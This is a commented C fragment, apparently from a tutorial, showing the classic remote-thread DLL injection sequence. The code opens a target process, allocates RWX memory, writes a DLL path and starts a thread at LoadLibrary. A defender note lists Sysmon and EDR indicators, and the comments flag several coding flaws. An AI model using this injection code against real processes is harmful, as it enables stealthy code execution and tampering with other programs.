/*
 * Fragment of a remote-thread DLL-injection routine: the sequence is
 * OpenProcess -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread
 * with LoadLibrary as the thread start address. The enclosing function (and
 * its return type) lies outside this excerpt; the bare `return -1` statements
 * below belong to it.
 *
 * Defender note: this exact call chain is the textbook remote-thread injection
 * pattern. The cross-process CreateRemoteThread call is what Sysmon Event ID 8
 * records and what EDR user-mode hooks commonly intercept; the RWX allocation
 * and the LoadLibrary start address are the usual triage indicators.
 */
/* Wide-char path of the DLL to load; the literal here is only a placeholder. */
WCHAR szDllName[] = L"/*要注入的dll的路径*/";
/* Bail out when no path was supplied. */
if(szDllName[0] == NULL)
return -1;
// 1. Open the target process with full access (PID is a placeholder here).
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, /*target PID*/);
if(hProcess == INVALID_HANDLE_VALUE)
return -1;
// 2. Commit one 4096-byte page in the remote process, mapped read/write/execute.
LPVOID pszDllName = VirtualAllocEx(hProcess, NULL, 4096, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if(NULL == pszDllName)
return -1;
// 3. Copy MAX_PATH bytes starting at szDllName into the remote page
//    (the length is a fixed constant, not the size of szDllName).
if(!WriteProcessMemory(hProcess, pszDllName, szDllName, MAX_PATH, NULL))
return -1;
// 4. Start a thread in the remote process whose entry point is LoadLibrary and
//    whose single argument is the remote copy of the DLL path.
HANDLE hInjectthread = CreateRemoteThread(hProcess,
NULL,
0,
(LPTHREAD_START_ROUTINE)LoadLibrary,
pszDllName,
NULL,
NULL);
if(NULL == hInjectthread)
return -1;
// 5. Block until the remote thread exits (-1 passed as the timeout argument).
DWORD dw = WaitForSingleObject(hInjectthread, -1);
// 6. The thread's exit code is LoadLibrary's return value, i.e. the module base;
//    the return value of GetExitCodeThread itself is not checked here.
DWORD dwExitCode;
GetExitCodeThread(hInjectthread, &dwExitCode);
HMODULE hMod = (HMODULE)dwExitCode;
// 7. Decommit the remote page that held the path.
if(!VirtualFreeEx(hProcess, pszDllName, 4096, MEM_DECOMMIT))
return -1;
/* Only the process handle is closed; hInjectthread is never passed to CloseHandle. */
CloseHandle(hProcess);
DLL注入之远程线程注入